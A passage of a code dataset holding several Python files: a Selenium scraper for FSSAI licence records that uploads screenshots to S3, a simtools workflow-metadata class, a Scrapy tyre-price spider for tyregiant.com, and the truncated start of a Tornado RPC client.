self.readConfig()\r\n self.CreateS3()\r\n self.dbObj = DB(**self.dbConfig)\r\n self.refid = refid\r\n\r\n\r\n\r\n\r\n def readConfig(self):\r\n configFileName = f\"config_{self.env}.json\"\r\n with open(configFileName, 'r') as confFile:\r\n config = json.load(confFile)\r\n self.driverConfig = config['driverConfig']\r\n self.dbConfig = config['dbConfig']\r\n\r\n def makeDirIfNot(self, dirpath):\r\n\r\n try:\r\n os.makedirs(dirpath)\r\n\r\n except FileExistsError:\r\n pass\r\n\r\n def makeDriverDirs(self):\r\n self.makeDirIfNot(self.screenshotDir)\r\n\r\n def CreateS3(self):\r\n\r\n try:\r\n self.session = boto3.session.Session(aws_access_key_id=self.driverConfig['s3']['AWS_ACCESS_KEY_ID'],\r\n aws_secret_access_key=self.driverConfig['s3']['AWS_SECRET_ACCESS_KEY'],\r\n region_name=self.driverConfig['s3']['REGION_HOST'])\r\n\r\n self.resource = self.session.resource(\"s3\")\r\n self.bucket = self.resource.Bucket(self.driverConfig[\"s3\"][\"AWS_STORAGE_BUCKET_NAME\"])\r\n\r\n except ClientError as e:\r\n self.logStatus(\"critical\", f\"could not connect to s3 {e}\")\r\n raise Exception(\"couldn't connect to s3\")\r\n\r\n except Exception as e:\r\n self.logStatus(\"critical\", f\"could not connect to s3 {e}\")\r\n raise Exception(\"couldn't connect to s3\")\r\n\r\n def uploadToS3(self, filename, key):\r\n self.bucket.upload_file(\r\n Filename=filename, Key=key)\r\n\r\n def takeScreenshot(self):\r\n\r\n time.sleep(self.timeBwPage)\r\n\r\n sname = str(uuid.uuid1()) + '.png'\r\n screenshotName = os.path.join(self.screenshotDir, f\"{sname}\")\r\n self.driver.save_screenshot(screenshotName)\r\n self.uploadToS3(os.path.join(screenshotName), 'screenshots/' + self.refid + \"/\" + sname)\r\n return sname\r\n\r\n def logStatus(self, level, message, screenshot=None):\r\n\r\n if self.dbObj is not None:\r\n\r\n self.dbObj.insertLog(self.refid, time.strftime('%Y-%m-%d %H-%M-%S'), level, message,\r\n 'KAGGLE', self.env, screenshot)\r\n print(f\"{level}: {message}, screenshot: {screenshot}\")\r\n\r\n def generate_response(self,LicenseKey):\r\n from selenium import webdriver\r\n from selenium.webdriver.chrome.options import Options\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--disable-extensions\")\r\n chrome_options.add_argument(\"--disable-gpu\")\r\n chrome_options.add_argument(\"--headless\")\r\n chrome_options.headless = True\r\n chrome_options.add_argument(\"--disable-extension\")\r\n chrome_options.add_argument(\"no-sandbox\")\r\n self.driver = webdriver.Chrome(\"/usr/local/bin/chromedriver\", options=chrome_options)\r\n start_url = \"https://www.kaggle.com/\"\r\n try:\r\n self.driver.get(start_url)\r\n x = 1\r\n self.makeDriverDirs()\r\n self.logStatus(\"info\", \"FSSAI page opened\", self.takeScreenshot())\r\n try:\r\n\r\n cantreach = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"main-message\"]/h1/span\"\"\")\r\n cantreach = cantreach.text\r\n\r\n if cantreach == cantreach:\r\n r = 2\r\n except:\r\n pass\r\n except Exception as e:\r\n x = 2\r\n\r\n self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_txtLicense\"]\"\"\").click()\r\n self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_txtLicense\"]\"\"\").send_keys(LicenseKey)\r\n\r\n self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_btnSubmit\"]\"\"\").click()\r\n\r\n if x == 1:\r\n #try:\r\n # errortype1 = self.driver.find_element_by_xpath(\r\n # \"\"\"//*[@id=\"form1\"]/table/tbody/tr[1]/td/table/tbody/tr[1]/td/h5\"\"\")\r\n # errortype1 = 
errortype1.text\r\n # if errortype1 == \" An error has occured, sorry for the inconvenience. Please login again.\":\r\n # x = 2\r\n #except:\r\n # pass\r\n\r\n try:\r\n errortype = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblError\"]\"\"\")\r\n errortype = errortype.text\r\n errortype1 = self.driver.find_element_by_xpath(\"\"\"// *[ @ id = \"form1\"] / table / tbody / tr[1] / td / table / tbody / tr[1] / td / h5\"\"\")\r\n errortype1 = errortype1.text\r\n if errortype == \"Record Not Found\":\r\n x = 3\r\n elif errortype == \"Timeout expired. The timeout period elapsed prior to completion of the operation or the server is not responding.\":\r\n x = 4\r\n elif errortype == \"Invalid License No.\":\r\n x = 3\r\n elif errortype == \"Invalid object name 'Master_ErrorDesc'.\":\r\n x = 3\r\n elif errortype1 == errortype1:\r\n x = 4\r\n\r\n except:\r\n x = 6\r\n if x == 6:\r\n self.makeDriverDirs()\r\n self.logStatus(\"info\", \"starting scraping\", self.takeScreenshot())\r\n Products = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblProduct\"]\"\"\")\r\n Productstext = Products.text\r\n Id = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblLicence\"]\"\"\")\r\n IDnum = Id.text\r\n Expiry_Date = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblExpDate\"]\"\"\")\r\n ExpiryDate = Expiry_Date.text\r\n from datetime import datetime\r\n date_obj = datetime.strptime(ExpiryDate, '%d/%m/%Y')\r\n ExpiryDate = date_obj.strftime('%d-%b-%Y')\r\n Status = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblStatus\"]\"\"\")\r\n GivenStatus = Status.text\r\n Company_Name = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblcopName\"]\"\"\")\r\n CompanyName = Company_Name.text\r\n Premises_Address = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblAddress\"]\"\"\")\r\n PremisesAddress = Premises_Address.text\r\n Kind_of_Business = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblKob\"]\"\"\")\r\n KindofBusiness = Kind_of_Business.text\r\n message = \"Successfully Completed.\"\r\n code = \"SRC001\"\r\n dic = {}\r\n dic[\"companyName\"] = CompanyName\r\n dic[\"expiryDate\"] = ExpiryDate\r\n dic[\"kindOfBusiness\"] = KindofBusiness\r\n dic[\"licenceNumber\"] = IDnum\r\n dic[\"premisesAddress\"] = PremisesAddress\r\n dic[\"products\"] = Productstext\r\n dic[\"status\"] = GivenStatus\r\n dic = {\"data\": dic, \"responseCode\": code, \"responseMessage\": message}\r\n self.logStatus(\"info\", \"completed scraping\", self.takeScreenshot())\r\n return dic\r\n\r\n\r\n elif x == 2:\r\n message = 'Unable To Process. 
Please Reach Out To Support.'\r\n code = 'EUP007'\r\n IDnum = 'null'\r\n ExpiryDate = 'null'\r\n KindofBusiness = 'null'\r\n Productstext = 'null'\r\n GivenStatus = 'null'\r\n CompanyName = 'null'\r\n PremisesAddress = 'null'\r\n dic = {}\r\n dic['companyName'] = CompanyName\r\n dic['expiryDate'] = ExpiryDate\r\n dic['kindOfBusiness'] = KindofBusiness\r\n dic['licenceNumber'] = IDnum\r\n dic['premisesAddress'] = PremisesAddress\r\n dic['products'] = Productstext\r\n dic['status'] = GivenStatus\r\n dic = {'data': dic, 'responseCode': code, 'responseMessage': message}\r\n return dic\r\n elif x == 3:\r\n dic = {}\r\n IDnum = 'null'\r\n ExpiryDate = 'null'\r\n KindofBusiness = 'null'\r\n Productstext = 'null'\r\n GivenStatus = 'null'\r\n CompanyName = 'null'\r\n PremisesAddress = 'null'\r\n message = 'No Information Found.'\r\n code = 'ENI004'\r\n dic['companyName'] = CompanyName\r\n dic['expiryDate'] = ExpiryDate\r\n dic['kindOfBusiness'] = KindofBusiness\r\n dic['licenceNumber'] = IDnum\r\n dic['premisesAddress'] = PremisesAddress\r\n dic['products'] = Productstext\r\n dic['status'] = GivenStatus\r\n dic = {'data': dic, 'responseCode': code, 'responseMessage': message}\r\n return dic\r\n elif x == 4:\r\n Products = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblProduct\"]\"\"\")\r\n Productstext = Products.text\r\n # the portal timed out; raise (instead of returning the Exception class) so FSSAI_response can retry\r\n raise Exception('Timeout expired while scraping the FSSAI record')\r\n\r\n def FSSAI_response(self,LicenseKey):\r\n import json\r\n\r\n LicenseKey = LicenseKey\r\n dic = {}\r\n try:\r\n self.logStatus(\"info\", \"Opening webpage\")\r\n dic = self.generate_response(LicenseKey)\r\n except Exception as e:\r\n print(e)\r\n self.logStatus(\"critical\", \"timeout error retrying\")\r\n try:\r\n self.logStatus(\"info\", \"Opening webpage\")\r\n dic = self.generate_response(LicenseKey)\r\n except Exception as e:\r\n print(e)\r\n self.logStatus(\"critical\", \"timeout error retrying\")\r\n try:\r\n self.logStatus(\"info\", \"Opening webpage\")\r\n dic = self.generate_response(LicenseKey)\r\n except Exception as e:\r\n print(e)\r\n self.logStatus(\"critical\", \"no data found\")\r\n IDnum = 'null'\r\n ExpiryDate = 'null'\r\n KindofBusiness = 'null'\r\n Productstext = 'null'\r\n GivenStatus = 'null'\r\n CompanyName = 'null'\r\n PremisesAddress = 'null'\r\n message = 'Unable To Process. 
Please Reach Out To Support.'\r\n code = 'EUP007'\r\n dic['companyName'] = CompanyName\r\n dic['expiryDate'] = ExpiryDate\r\n dic['kindOfBusiness'] = KindofBusiness\r\n dic['licenceNumber'] = IDnum\r\n dic['premisesAddress'] = PremisesAddress\r\n dic['products'] = Productstext\r\n dic['status'] = GivenStatus\r\n dic = {'data': dic, 'responseCode': code, 'responseMessage': message}\r\n self.logStatus(\"info\", \"No Info Found\")\r\n dic = json.dumps(dic)\r\n return dic\r\n","sub_path":"Kagglescrapper.py","file_name":"Kagglescrapper.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"137301292","text":"import datetime\nimport logging\nimport uuid\nfrom pathlib import Path\n\nimport simtools.util.general as gen\nimport simtools.version\nfrom simtools import io_handler\nfrom simtools.data_model import meta_data_model, validate_schema\nfrom simtools.util import names\n\n__all__ = [\"WorkflowDescription\"]\n\n\nclass WorkflowDescription:\n \"\"\"\n Workflow description, configuration and metadata class.\n Assigns uuid to workflow in ACIVITY:ID\n\n Parameters\n ----------\n args: argparse.Namespace\n Command line parameters\n\n \"\"\"\n\n def __init__(self, args_dict):\n \"\"\"\n Initialize workflow configuration.\n \"\"\"\n\n self._logger = logging.getLogger(__name__)\n self.io_handler = io_handler.IOHandler()\n\n self.args_dict = args_dict\n self.workflow_config = meta_data_model.workflow_configuration_schema()\n self.workflow_config[\"activity\"][\"name\"] = args_dict[\"label\"]\n self.workflow_config[\"activity\"][\"id\"] = str(uuid.uuid4())\n\n self._read_workflow_configuration(self.args_dict.get(\"workflow_config\", None))\n self.workflow_config[\"configuration\"] = self.args_dict\n\n self.top_level_meta = gen.change_dict_keys_case(\n meta_data_model.top_level_reference_schema(), True\n )\n self.collect_product_meta_data()\n\n def collect_product_meta_data(self):\n \"\"\"\n Collect and verify product metadata.\n\n \"\"\"\n\n self._fill_association_meta_from_args(\n self.top_level_meta[\"cta\"][\"context\"][\"sim\"][\"association\"]\n )\n\n self._fill_product_meta(self.top_level_meta[\"cta\"][\"product\"])\n\n self._fill_top_level_meta_from_file(self.top_level_meta[\"cta\"])\n\n self._fill_association_id(self.top_level_meta[\"cta\"][\"context\"][\"sim\"][\"association\"])\n\n self._fill_activity_meta(self.top_level_meta[\"cta\"][\"activity\"])\n\n def set_configuration_parameter(self, key, value):\n \"\"\"\n Set value of workflow configuration parameter.\n\n Parameters\n ----------\n key: (str,required)\n Key of the workflow configuration dict.\n value: (str,required)\n Value of the workflow configuration dict associated to 'key'.\n\n Raises\n ------\n KeyError\n if configuration does not exist in workflow.\n\n \"\"\"\n try:\n self.workflow_config[\"configuration\"][key] = value\n except KeyError:\n self._logger.error(f\"Missing key {key} in configuration\")\n raise\n\n def get_configuration_parameter(self, key):\n \"\"\"\n Return value of workflow configuration parameter.\n\n Parameters\n ----------\n key: (str,required)\n Key of the workflow configuration dict.\n\n Returns\n -------\n configuration value\n value of configuration parameter\n\n Raises\n ------\n KeyError\n if configuration does not exist in workflow\n \"\"\"\n\n try:\n return self.workflow_config[\"configuration\"][key]\n except KeyError:\n self._logger.error(f\"Missing key {key} in configuration\")\n raise\n\n def 
reference_data_columns(self):\n \"\"\"\n Return reference data column definition expected in input data.\n\n Returns\n -------\n data_columns dict\n Reference data columns\n\n Raises\n ------\n KeyError\n if data_columns does not exist in workflow configuration.\n\n \"\"\"\n\n try:\n return self.workflow_config[\"data_columns\"]\n except KeyError:\n self._logger.error(\"Missing data_columns entry in workflow configuration\")\n print(self.workflow_config)\n raise\n\n def product_data_file_name(self, suffix=None, full_path=True):\n \"\"\"\n Return name of product data file.\n\n File name is the combination of activity id (or 'TEST' if CONFIGURATION:TEST is set) and:\n a. Top-level meta ['product']['name']\n or\n b. Top-level meta ['activity']['name']\n\n (depending which one is set)\n\n Parameters\n ----------\n suffix: str\n file name extension (if None: use product_data_file_format())\n full_path: bool\n if True: return path + file name, otherwise file name only.\n\n Returns\n -------\n Path\n data file path and name\n\n Raises\n ------\n KeyError\n if data file name is not defined in workflow configuration or in product metadata dict.\n TypeError\n if activity:name and product:filename is None.\n\n \"\"\"\n\n try:\n if self.workflow_config[\"configuration\"][\"test\"]:\n _filename = \"TEST\"\n else:\n _filename = self.workflow_config[\"activity\"][\"id\"]\n if self.workflow_config[\"product\"][\"filename\"]:\n _filename += \"-\" + self.workflow_config[\"product\"][\"filename\"]\n else:\n _filename += \"-\" + self.workflow_config[\"activity\"][\"name\"]\n except KeyError:\n self._logger.error(\"Missing cta:product:id in metadata\")\n raise\n except TypeError:\n self._logger.error(\"Missing activity:name in metadata\")\n raise\n\n if not suffix:\n suffix = \".\" + self.product_data_file_format(suffix=True)\n\n if full_path:\n return Path(self.product_data_directory()).joinpath(_filename + suffix)\n return Path(_filename + suffix)\n\n def product_data_file_format(self, suffix=False):\n \"\"\"\n Return file format for product data.\n\n Parameters\n ----------\n suffix: bool\n Return the ecsv suffix (if format is ascii.ecsv),\n Return file format (if false)\n\n Returns\n -------\n str\n File format of data product; default file format is 'ascii.ecsv'.\n\n Raises\n ------\n KeyError\n if relevant fields are not defined in top level metadata dictionary.\n \"\"\"\n\n _file_format = \"ascii.ecsv\"\n try:\n if self.workflow_config[\"product\"][\"format\"] is not None:\n _file_format = self.workflow_config[\"product\"][\"format\"]\n except KeyError:\n self._logger.info(\"Using default file format for model file: ascii.ecsv\")\n\n if suffix and _file_format == \"ascii.ecsv\":\n _file_format = \"ecsv\"\n\n return _file_format\n\n def product_data_directory(self):\n \"\"\"\n Output directory for data products.\n\n Returns\n -------\n path\n output directory for data products\n\n \"\"\"\n\n _output_dir = self.io_handler.get_output_directory(\n self.workflow_config[\"activity\"][\"name\"], \"product-data\"\n )\n self._logger.debug(f\"Outputdirectory {_output_dir}\")\n return _output_dir\n\n def _fill_association_meta_from_args(self, association_dict):\n \"\"\"\n Append association meta data set through configurator.\n\n Parameters\n ----------\n association_dict: dict\n Dictionary for assocation metadata field.\n\n Raises\n ------\n AttributeError\n if error reading association meta data from args.\n KeyError\n if metadata description cannot be filled.\n\n \"\"\"\n self._logger.debug(f\"Fill metadata 
from args: {self.args_dict}\")\n\n _association = {}\n try:\n if \"site\" in self.args_dict:\n _association[\"site\"] = self.args_dict[\"site\"]\n if \"telescope\" in self.args_dict:\n _split_telescope_name = self.args_dict[\"telescope\"].split(\"-\")\n _association[\"class\"] = _split_telescope_name[0]\n _association[\"type\"] = _split_telescope_name[1]\n _association[\"subtype\"] = _split_telescope_name[2]\n except KeyError:\n self._logger.error(\"Error reading association meta data from args\")\n raise\n except AttributeError as e:\n self._logger.debug(f\"Missing parameter on command line, use defaults ({e})\")\n\n self._fill_context_sim_list(association_dict, _association)\n\n def _fill_top_level_meta_from_file(self, top_level_dict):\n \"\"\"\n Read and validate metadata from file. Fill metadata into top-level template.\n\n Parameters\n ----------\n top_level_dict: dict\n Dictionary for top level metadata.\n\n Raises\n ------\n KeyError\n if corresponding fields cannot be accessed in the top-level or metadata dictionaries.\n\n \"\"\"\n\n _schema_validator = validate_schema.SchemaValidator()\n try:\n _input_meta = _schema_validator.validate_and_transform(\n meta_file_name=self.workflow_config[\"configuration\"][\"input_meta\"],\n lower_case=True,\n )\n except KeyError:\n self._logger.debug(\"No input metadata file defined\")\n return\n\n try:\n self._merge_config_dicts(top_level_dict, _input_meta)\n except KeyError:\n self._logger.error(\"Error reading input meta data\")\n raise\n # list entry copies\n for association in _input_meta[\"product\"][\"association\"]:\n self._fill_context_sim_list(\n top_level_dict[\"context\"][\"sim\"][\"association\"], association\n )\n try:\n for document in _input_meta[\"context\"][\"document\"]:\n self._fill_context_sim_list(top_level_dict[\"context\"][\"sim\"][\"document\"], document)\n except KeyError:\n top_level_dict[\"context\"][\"sim\"].pop(\"document\")\n\n def _fill_product_meta(self, product_dict):\n \"\"\"\n Fill metadata for data products fields.\n\n Parameters\n ----------\n product_dict: dict\n Dictionary describing data product.\n\n Raises\n ------\n KeyError\n if relevant fields are not defined in top level metadata dictionary.\n\n \"\"\"\n\n product_dict[\"id\"] = self.workflow_config[\"activity\"][\"id\"]\n self._logger.debug(f\"Assigned ACTIVITY UUID {product_dict['id']}\")\n\n product_dict[\"data\"][\"category\"] = \"SIM\"\n product_dict[\"data\"][\"level\"] = \"R0\"\n product_dict[\"data\"][\"type\"] = \"service\"\n product_dict[\"data\"][\"model\"][\"name\"] = \"simpipe-table\"\n product_dict[\"data\"][\"model\"][\"version\"] = \"0.1.0\"\n product_dict[\"format\"] = self.product_data_file_format()\n product_dict[\"filename\"] = str(self.product_data_file_name(full_path=False))\n\n @staticmethod\n def _fill_association_id(association_dict):\n \"\"\"\n Fill association id from site and telescope class, type, subtype.\n\n Parameters\n ----------\n association_dict: dict\n Association dictionary.\n\n \"\"\"\n for association in association_dict:\n try:\n association[\"id\"] = names.simtools_instrument_name(\n association[\"site\"],\n association[\"class\"],\n association[\"type\"],\n association[\"subtype\"],\n )\n except ValueError:\n association[\"id\"] = None\n\n def _fill_activity_meta(self, activity_dict):\n \"\"\"\n Fill activity (software) related meta data\n\n Parameters\n ----------\n activity_dict: dict\n Dictionary for top-level activity meta data.\n\n Raises\n ------\n KeyError\n if relevant fields are not defined in top 
level metadata\n dictionary\n\n \"\"\"\n try:\n activity_dict[\"name\"] = self.workflow_config[\"activity\"][\"name\"]\n activity_dict[\"start\"] = datetime.datetime.now().isoformat(timespec=\"seconds\")\n activity_dict[\"end\"] = activity_dict[\"start\"]\n activity_dict[\"software\"][\"name\"] = \"simtools\"\n activity_dict[\"software\"][\"version\"] = simtools.version.__version__\n except KeyError:\n self._logger.error(\"Error filling ACTIVITY metadata from input metadata\")\n raise\n\n def _read_workflow_configuration(self, workflow_config_file):\n \"\"\"\n Read workflow configuration from file and merge it with existing workflow config. Keys are \\\n changed to lower case.\n\n Parameters\n ----------\n workflow_config_file\n name of configuration file describing this workflow.\n\n \"\"\"\n\n if workflow_config_file:\n try:\n _workflow_from_file = gen.change_dict_keys_case(\n gen.collect_data_from_yaml_or_dict(workflow_config_file, None)[\"CTASIMPIPE\"],\n True,\n )\n self._logger.debug(f\"Reading workflow configuration from {workflow_config_file}\")\n except KeyError:\n self._logger.debug(\"Error reading CTASIMPIPE workflow configuration\")\n # nothing to merge; returning here also avoids a NameError below\n return\n\n self._merge_config_dicts(self.workflow_config, _workflow_from_file, True)\n\n def _merge_config_dicts(self, dict_high, dict_low, add_new_fields=False):\n \"\"\"\n Merge two config dicts and replace values in dict_high which are NoneType. Priority to \\\n dict_high in case of conflicting entries.\n\n Parameters\n ----------\n dict_high: dict\n Dictionary into which values are merged.\n dict_low: dict\n Dictionary from which values are taken for merging.\n add_new_fields: bool\n If true: add fields from dict_low to dict_high, if they don't exist in dict_high\n\n \"\"\"\n\n if dict_high is None and dict_low:\n dict_high = dict_low\n return\n\n for k in dict_low:\n if k in dict_high:\n if isinstance(dict_low[k], dict):\n self._merge_config_dicts(dict_high[k], dict_low[k], add_new_fields)\n elif dict_high[k] is None:\n dict_high[k] = dict_low[k]\n elif dict_high[k] != dict_low[k] and dict_low[k] is not None:\n self._logger.debug(\n f\"Conflicting entries between dict: {dict_high[k]} vs {dict_low[k]} \"\n f\"(use {dict_high[k]})\"\n )\n elif add_new_fields:\n dict_high[k] = dict_low[k]\n\n def input_data_file_name(self):\n \"\"\"\n Return input data file (full path).\n\n Returns\n -------\n str\n Input data file (full path).\n\n Raises\n ------\n KeyError\n if missing description of CONFIGURATION:INPUT_DATA\n \"\"\"\n\n try:\n return self.workflow_config[\"configuration\"][\"input_data\"]\n except KeyError:\n self._logger.error(\"Missing description of CONFIGURATION:INPUT_DATA\")\n raise\n\n @staticmethod\n def _fill_context_sim_list(product_list, new_entry_dict):\n \"\"\"\n Fill list-type entries into metadata. 
Take into account the first list entry is the default\\\n value filled with Nones.\n\n Returns\n -------\n list\n Updated product list.\n\n \"\"\"\n\n if len(new_entry_dict) == 0:\n return []\n try:\n if any(v is not None for v in product_list[0].values()):\n product_list.append(new_entry_dict)\n else:\n product_list[0] = new_entry_dict\n except (TypeError, IndexError):\n product_list = [new_entry_dict]\n return product_list\n","sub_path":"simtools/data_model/workflow_description.py","file_name":"workflow_description.py","file_ext":"py","file_size_in_byte":15680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547658499","text":"import re\nimport os\nimport csv\nimport json\nfrom urlparse import urljoin\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.exceptions import DontCloseSpider\n\nfrom product_spiders.base_spiders.matcher import Matcher\nfrom product_spiders.items import Product, ProductLoader\n\nfrom micheldeveritems import MicheldeverMeta\nfrom micheldeverutils import find_mts_stock_code, is_product_correct, get_speed_rating, get_alt_speed, \\\n find_brand_segment, unify_brand\n\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\nclass TyreGiantSpider(BaseSpider):\n name = 'tyregiant.com_test'\n allowed_domains = ['tyregiant.com']\n start_urls = ('http://www.tyregiant.com/',)\n tyre_sizes = []\n brands = []\n manually_matched = []\n all_man_marks = {}\n\n download_delay = 0.1\n\n def __init__(self, *args, **kwargs):\n super(TyreGiantSpider, self).__init__(*args, **kwargs)\n self.matcher = Matcher(self.log)\n\n with open(os.path.join(HERE, 'mtsstockcodes.csv')) as f:\n reader = csv.DictReader(f)\n for row in reader:\n self.tyre_sizes.append(row)\n\n with open(os.path.join(HERE, 'manmarks.csv')) as f:\n reader = csv.DictReader(f)\n for row in reader:\n self.all_man_marks[row['code']] = row['manufacturer_mark']\n\n self.brands = [row['Brand'] for row in self.tyre_sizes]\n\n self.search_history = set()\n\n self.finished = False\n\n dispatcher.connect(self.spider_idle, signals.spider_idle)\n\n def _get_history_key(self, search_params):\n key = \"%(width)s-%(rim)s-%(aspect_ratio)s-%(speed_rating)s\" % search_params\n return key\n\n def check_in_history(self, search_params):\n if self._get_history_key(search_params) in self.search_history:\n return True\n return False\n\n def add_to_history(self, search_params):\n self.search_history.add(self._get_history_key(search_params))\n\n def spider_idle(self, spider):\n if not self.finished:\n request = Request(self.start_urls[0], dont_filter=True, callback=self.parse)\n self._crawler.engine.crawl(request, self)\n raise DontCloseSpider\n\n def parse(self, response):\n for r in self.next_search():\n yield r\n\n def next_search(self):\n request_sent = False\n for i, row in enumerate(self.tyre_sizes, 1):\n for speed_rating in [row['Speed rating'], row['Alt Speed']]:\n if not speed_rating:\n continue\n\n search_params = {\n 'width': row['Width'],\n 'aspect_ratio': row['Aspect Ratio'],\n 'speed_rating': speed_rating,\n 'rim': row['Rim']\n }\n\n if self.check_in_history(search_params):\n continue\n\n self.log(\"Checking row: %s\" % str({\n 'width': row['Width'],\n 'aspect_ratio': row['Aspect Ratio'],\n 'speed_rating': row['Speed rating'],\n 'rim': row['Rim']\n }))\n\n 
self.add_to_history(search_params)\n\n url = 'http://www.tyregiant.com/%(width)s-%(aspect_ratio)s-%(rim)s?speed=%(speed_rating)s' % \\\n search_params\n yield Request(url, dont_filter=True, meta={'search_params': search_params}, callback=self.parse_search)\n request_sent = True\n break\n if request_sent:\n break\n else:\n self.finished = True\n return\n\n def parse_search(self, response):\n meta = response.meta\n url = 'http://www.tyregiant.com/update-tyres/1'\n meta['page'] = 1\n yield Request(url, dont_filter=True, callback=self.parse_products, meta=meta)\n\n def parse_products(self, response):\n html_response = json.loads(response.body)['display_tyres']\n hxs = HtmlXPathSelector(text=html_response)\n\n search_params = response.meta['search_params']\n\n products = hxs.select('//div[contains(@class, \"tyre_container\")]')\n\n for product_el in products:\n loader = ProductLoader(item=Product(), selector=product_el)\n\n brand = product_el.select('.//form/span[@class=\"tyre_brand_text\"]/text()').extract()\n brand = brand[0] if brand else ''\n\n winter_tyre = hxs.select('/div/div/div[@class=\"winter_img\"]').extract()\n if not winter_tyre:\n for tyre_brand in self.brands:\n if tyre_brand.upper() == brand.strip().upper():\n brand = tyre_brand\n full_name = product_el.select('.//form/span[@class=\"tyre_brand_text\"]/text()').extract()[-1]\n\n loader.add_value('name', full_name)\n loader.add_value('brand', unify_brand(brand))\n loader.add_value('category', find_brand_segment(loader.get_output_value('brand')))\n identifier = product_el.select('.//input[@name=\"tyre\"]/@value').extract()\n loader.add_value('identifier', identifier)\n\n loader.add_value('url', 'http://www.tyregiant.com')\n\n image_url = product_el.select('.//img[@class=\"tyre_image\"]/@src').extract()\n\n if image_url:\n loader.add_value('image_url', urljoin(get_base_url(response), image_url[0]))\n\n price = product_el.select('.//*[@class=\"tyre_price\"]/span/text()').extract()\n\n if not price:\n loader.add_value('stock', 0)\n\n loader.add_value('price', price)\n\n metadata = MicheldeverMeta()\n metadata['aspect_ratio'] = search_params['aspect_ratio']\n metadata['rim'] = search_params['rim']\n\n tyre_details = product_el.select('.//form/p[@class=\"tyre_details\"]/text()').extract()[0]\n speed = re.search('(\\s\\d+\\w+\\s)', tyre_details)\n load_rating = speed.group().strip()[:-1] if speed else ''\n speed_rating = speed.group().strip()[-1] if speed else ''\n\n metadata['speed_rating'] = speed_rating\n metadata['load_rating'] = load_rating\n\n metadata['width'] = search_params['width']\n\n metadata['fitting_method'] = 'Fitted'\n metadata['alternative_speed_rating'] = ''\n xl = product_el.select('.//img[@class=\"xl_img\"]/@src').extract()\n metadata['xl'] = 'Yes' if xl else 'No'\n run_flat = product_el.select('.//img[@class=\"rf_img\"]/@src').extract()\n metadata['run_flat'] = 'Yes' if run_flat else 'No'\n\n metadata['manufacturer_mark'] = self._get_manufacturer_code(full_name)\n\n metadata['full_tyre_size'] = '/'.join((search_params['width'],\n search_params['aspect_ratio'],\n search_params['rim'],\n metadata['load_rating'],\n metadata['speed_rating']))\n # metadata['alternative_speed_rating']))\n product = loader.load_item()\n product['metadata'] = metadata\n\n if not is_product_correct(product):\n continue\n\n product['metadata']['mts_stock_code'] = find_mts_stock_code(product, spider_name=self.name, log=self.log)\n\n new_speed_rating = get_speed_rating(product)\n new_alt_speed = get_alt_speed(product)\n 
product['metadata']['alternative_speed_rating'] = new_alt_speed if new_alt_speed else \\\n product['metadata']['speed_rating'] if product['metadata']['speed_rating'] != new_speed_rating else ''\n product['metadata']['speed_rating'] = new_speed_rating\n yield product\n\n if products:\n meta = response.meta\n next_page = meta['page'] + 1\n next_url = 'http://www.tyregiant.com/update-tyres/%s' % str(next_page)\n meta['page'] = next_page\n yield Request(next_url, dont_filter=True, callback=self.parse_products, meta=meta)\n\n def _get_manufacturer_code(self, name):\n name = name.upper()\n for code, manufacturer_mark in self.all_man_marks.items():\n if code not in name:\n continue\n\n if code in name.split(' ') or code == '*':\n return manufacturer_mark\n\n return ''\n\n def match_name(self, search_name, new_item, match_threshold=90, important_words=None):\n r = self.matcher.match_ratio(search_name, new_item, important_words)\n return r >= match_threshold\n","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/micheldever_test/tyregiant_spider.py","file_name":"tyregiant_spider.py","file_ext":"py","file_size_in_byte":9080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"236996663","text":"# coding:utf-8\nfrom __future__ import absolute_import, division, print_function, with_statement\n\nimport collections\nimport struct\nimport functools\nimport time\nimport traceback\nimport datetime\nimport tornado.ioloop\nfrom tornado import queues\nfrom google.protobuf import service\nfrom google.protobuf.message import Message\nfrom tornado.iostream import StreamClosedError\nfrom tornado.tcpclient import TCPClient as T\nimport tornado.gen\nimport tornado.tcpclient\nfrom management import log\nfrom management.ipc.generated.header_pb2 import RequestHeader, ResponseHeader, OK, ResponseStatus, CallHeader\nfrom management.ipc.rpcstream import RpcStream\nfrom management.util import inet_address\n\n\nclass ResponseStatusError(Exception):\n def __init__(self, status, message):\n self.status = status\n self.message = message\n\n def __str__(self):\n message = \"RPC %s\" % ResponseStatus.Name(self.status)\n if self.message:\n return message + \" (\" + self.message + \")\"\n else:\n return message\n\n\nclass TCPClient(T):\n def _create_stream(self, max_buffer_size, af, addr):\n # Always connect in plaintext; we'll convert to ssl if necessary\n # after one connection has completed.\n stream = RpcStream(tornado.tcpclient.socket.socket(af),\n io_loop=self.io_loop,\n max_buffer_size=max_buffer_size)\n return stream.connect(addr)\n\n\nclass Client(service.RpcChannel):\n 